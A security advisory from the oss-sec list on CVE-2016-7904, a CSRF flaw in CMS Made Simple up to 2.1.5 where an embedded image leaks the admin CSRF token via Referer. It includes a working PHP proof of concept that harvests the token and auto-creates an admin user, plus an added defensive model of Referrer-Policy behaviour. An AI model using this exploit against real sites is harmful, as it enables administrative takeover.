oss-sec mailing list archives
CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
From: "Hongkun Zeng" <hongkun.zeng () dbappsecurity com cn>
Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (http://www.dbappsecurity.com.cn/)

CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) that provides developers, programmers and site owners with a web-based development and administration area.

This is a security issue in CMSMS. Low-privilege users were able to gain control of an administrative session through a CSRF attack. Add an article and insert an image with the link http://attacker/csrfpoc.php; the Referer header sent when the image loads would then leak the user's CSRF token.

POC:

```
//File: csrfpoc.php
<?php
session_start();
if(!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_'])) exit;
if(isset($_SERVER['HTTP_REFERER'])){
    $parsed_url = parse_url($_SERVER['HTTP_REFERER']);
    $query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';
    parse_str("$query",$arr);
    if(isset($arr['_sk_'])){
        $_SESSION['_sk_'] = $arr['_sk_'];
    }
}
if(!isset($_SESSION['_sk_'])) exit;
?>
<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
</form>
<script>
document.createElement('form').submit.call(document.getElementById('form'));
</script>
```

Ref: http://dev.cmsmadesimple.org/project/changelog/5392

--
Best Regards,
Hongkun Zeng
--------------------------------------------------- hongkun.zeng (at) dbappsecurity.com.cn
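The root cause above is a CSRF token carried in the admin page's query string, which the browser copies into the Referer of every cross-origin image request under the default referrer policy of the time. The following added example (not part of the advisory or of CMSMS) models that browser behaviour for a few Referrer-Policy values so a defender can see which setting stops the token from reaching a third-party host; the URLs and the token value are constructed.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qs

# Constructed sample: an admin page whose URL carries the _sk_ token.
ADMIN_PAGE = "http://cms.example/admin/addcontent.php?_sk_=abc123def456"
# Constructed: an externally hosted image embedded in an article.
EXTERNAL_IMAGE = "http://attacker.example/csrfpoc.php"
LOCAL_IMAGE = "http://cms.example/uploads/logo.png"


def origin(url):
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port)


def referer_for(page_url, resource_url, policy):
    """Referer the browser sends when page_url loads resource_url under
    the given Referrer-Policy (subset of the spec; fragment always dropped)."""
    page = urlsplit(page_url)
    same_origin = origin(page_url) == origin(resource_url)
    full = urlunsplit((page.scheme, page.netloc, page.path, page.query, ""))
    origin_only = urlunsplit((page.scheme, page.netloc, "/", "", ""))
    downgrade = page.scheme == "https" and urlsplit(resource_url).scheme == "http"
    if policy == "no-referrer":
        return None
    if policy == "no-referrer-when-downgrade":  # old browser default
        return None if downgrade else full
    if policy == "strict-origin-when-cross-origin":  # current default
        if downgrade:
            return None
        return full if same_origin else origin_only
    raise ValueError("unsupported policy: " + policy)


def leaked_token(referer, param="_sk_"):
    """Return the CSRF token an off-site server could read from the Referer."""
    if referer is None:
        return None
    return parse_qs(urlsplit(referer).query).get(param, [None])[0]
```

Under the old default the external host receives the full URL with the token; with strict-origin-when-cross-origin it sees only the origin, while the real fix is to keep the token out of the URL altogether (for example in a POST body or custom header).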